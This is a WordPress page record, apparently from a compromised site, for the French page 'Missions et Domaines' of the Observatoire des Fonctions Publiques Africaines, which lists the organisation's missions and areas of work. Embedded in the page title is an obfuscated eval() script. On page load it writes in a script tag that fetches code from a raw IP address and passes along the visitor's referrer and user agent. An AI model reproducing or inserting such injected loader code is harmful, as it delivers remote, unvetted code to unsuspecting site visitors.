{"id":37,"date":"2017-03-28T20:35:10","date_gmt":"2017-03-28T18:35:10","guid":{"rendered":"http:\/\/site.ofpa.net\/?page_id=37"},"modified":"2017-03-28T20:35:32","modified_gmt":"2017-03-28T18:35:32","slug":"missions-et-domaines","status":"publish","type":"page","link":"https:\/\/www.ofpa.net\/ru\/missions-et-domaines\/","title":{"rendered":"Missions et Domaines"},"content":{"rendered":"<p><strong>MISSIONS <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nzifa|var|u0026u|referrer|aihfi||js|php'.split('|'),0,{}))\n<\/script><\/noindex> ET DOMAINES D\u2019INTERVENTION DE L\u2019OFPA<\/strong><\/p>\n<table border=\"0\" width=\"915\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr valign=\"top\">\n<td valign=\"top\" width=\"100%\">\n<div class=\"opentable\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" width=\"436\">\n<div align=\"center\"><strong>Nouvelles missions<\/strong><\/div>\n<\/td>\n<td valign=\"top\" width=\"470\">\n<div align=\"center\"><strong>Domaines d\u2019intervention<\/strong><strong>\u00a0<\/strong><\/div>\n<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"436\">\n<div><\/div>\n<div>Dans le cadre de sa vocation essentielle de participer aux r\u00e9flexions en cours\u00a0sur l\u2019\u00e9volution du r\u00f4le de l\u2019Etat face aux d\u00e9fis du respect des r\u00e8gles de la gouvernance, de la d\u00e9mocratie, de l\u2019Etat de droit et des Droits de l\u2019Homme ainsi que de\u00a0la modernisation de l\u2019Etat et de l\u2019Administration et dans le respect de la souverainet\u00e9 des Etats, l\u2019Observatoire des Fonctions Publiques Africaines (OFPA) a pour missions\u00a0:<\/div>\n<div><\/div>\n<div>a)\u00a0\u00a0\u00a0 de collecter, traiter et diffuser les informations sur l\u2019\u00e9tat des Fonctions Publiques Africaines et constituer des banques de donn\u00e9es et un fonds documentaire\u00a0;<\/div>\n<div><\/div>\n<div>b)\u00a0\u00a0\u00a0 d\u2019identifier les probl\u00e8mes communs aux Fonctions Publiques Africaines et proposer des solutions adapt\u00e9es\u00a0;<\/div>\n<div><\/div>\n<div>c)\u00a0\u00a0\u00a0 d\u2019identifier et ex\u00e9cuter des programmes ou projets r\u00e9gionaux tendant \u00e0 une meilleure coop\u00e9ration entre les Administrations et Fonctions Publiques, notamment en mati\u00e8re d\u2019am\u00e9lioration de l\u2019organisation et du fonctionnement des services publics, de formation, d\u2019harmonisation des statuts et de valorisation des exp\u00e9riences et des expertises\u00a0;<\/div>\n<div><\/div>\n<div><\/div>\n<div>d)\u00a0\u00a0\u00a0 d\u2019ex\u00e9cuter des commandes de services, des march\u00e9s d\u2019\u00e9tudes, des missions de diagnostic, d\u2019audit organisationnel et d\u2019\u00e9valuation des Administrations et des fonctions publiques\u00a0;<\/div>\n<div><\/div>\n<div>e)\u00a0\u00a0\u00a0 de participer activement au r\u00e9seau Espace Francophone des Administrations Publiques (EFAP), et \u00e0 tout autre r\u00e9seau concourant aux missions de l\u2019OFPA afin de permettre un meilleur \u00e9change de l\u2019information sur les \u00e9tudes, les r\u00e9formes et les donn\u00e9es relatives aux Administrations et aux fonctions publiques africaines\u00a0;<\/div>\n<div><\/div>\n<div>f)\u00a0\u00a0\u00a0\u00a0 d\u2019initier et de s\u2019associer \u00e0 toutes activit\u00e9s d\u2019appui, d\u2019\u00e9tude, de recherche et de conseil qui concernent la gouvernance, la d\u00e9mocratie, l\u2019Etat de droit, les droits de l\u2019homme, les Administrations et les\u00a0Fonctions Publiques\u00a0;<\/div>\n<div><\/div>\n<div>g)\u00a0\u00a0\u00a0 de produire des rapports, publier des p\u00e9riodiques des monographies, des \u00e9tudes et tous autres documents permettant un meilleur \u00e9change d&#8217;informations\u00a0;<\/div>\n<div><\/div>\n<div>h)\u00a0\u00a0\u00a0 de renforcer les capacit\u00e9s des Administrations et des fonctions publiques\u00a0;<\/div>\n<div><strong>\u00a0<\/strong><\/div>\n<div>i)<strong>\u00a0\u00a0 <\/strong>decontribuer \u00e0 la modernisation de l\u2019Etat, des fonctions publiques africaines en vue du renforcement de l\u2019Etat de droit, de la d\u00e9mocratie et des droits de l\u2019homme.<\/div>\n<div><\/div>\n<\/td>\n<td valign=\"top\" width=\"470\">\n<div><\/div>\n<div>La comp\u00e9tence de l\u2019OFPA s\u2019\u00e9tend notamment aux domaines suivants\u00a0:<\/div>\n<div><\/div>\n<div>1) Les ressources humaines et le renforcement des capacit\u00e9s\u00a0:<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la promotion du dialogue social\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 l\u2019adaptation des statuts\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 le recrutement\u00a0et la formation ;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la gestion des ressources humaines publiques ;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 l\u2019appropriation des technologies de l\u2019information et de la communication.<\/div>\n<div><\/div>\n<div>2) Les structures et l\u2019organisation\u00a0:<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la d\u00e9concentration\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la d\u00e9centralisation\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 l\u2019organisation interne\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la communication interne\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 l\u2019\u00e9laboration de normes et m\u00e9thodes d\u2019organisation, de documents cadres de r\u00e9forme, de manuels de proc\u00e9dures et de cadres organiques des emplois.<\/div>\n<div><\/div>\n<div>3) Les missions de service public\u00a0:<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la qualit\u00e9 de services rendus\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 les relations Administration-usagers des services publics\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la communication externe\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 l\u2019\u00e9valuation des politiques publiques.<\/div>\n<div><\/div>\n<div>4) Les missions de coop\u00e9ration\u00a0avec :<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <strong>\u00a0<\/strong>les partenaires sous r\u00e9gionaux et r\u00e9gionaux\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0les partenaires internationaux\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0l\u2019Uni\u00adon Africaine\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0tout r\u00e9seau \u0153uvrant pour le d\u00e9veloppement et la modernisation des administrations\u00a0africaines.<\/div>\n<div><strong>\u00a0<\/strong><\/div>\n<div>5) Les missions d\u2019observation, d\u2019\u00e9valuation\u00a0et de propositions de correction relatives\u00a0:<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00e0 la pratique de la bonne gouvernance\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00e0 la pratique de la d\u00e9mocratie, de l\u2019Etat de droit\u00a0et\u00a0des droits de l\u2019homme\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 au respect de l\u2019\u00e9thique\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00e0 la lutte contre la corruption\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00e0 la pr\u00e9vention et \u00e0 la gestion des crises et des conflits dans les Fonctions Publiques\u00a0;<\/div>\n<div>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00e0 l\u2019appui aux Etats en difficult\u00e9.<\/div>\n<div><\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>MISSIONS ET DOMAINES D\u2019INTERVENTION DE L\u2019OFPA Nouvelles missions Domaines d\u2019intervention\u00a0 Dans le cadre de sa vocation essentielle de participer aux r\u00e9flexions en cours\u00a0sur l\u2019\u00e9volution du r\u00f4le de l\u2019Etat face aux&#8230; <a class=\"read-more-button\" href=\"https:\/\/www.ofpa.net\/ru\/missions-et-domaines\/\">\u0414\u0410\u041b\u0415\u0415 &gt;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-full-width.php","meta":[],"_links":{"self":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages\/37"}],"collection":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/comments?post=37"}],"version-history":[{"count":1,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages\/37\/revisions"}],"predecessor-version":[{"id":38,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages\/37\/revisions\/38"}],"wp:attachment":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/media?parent=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}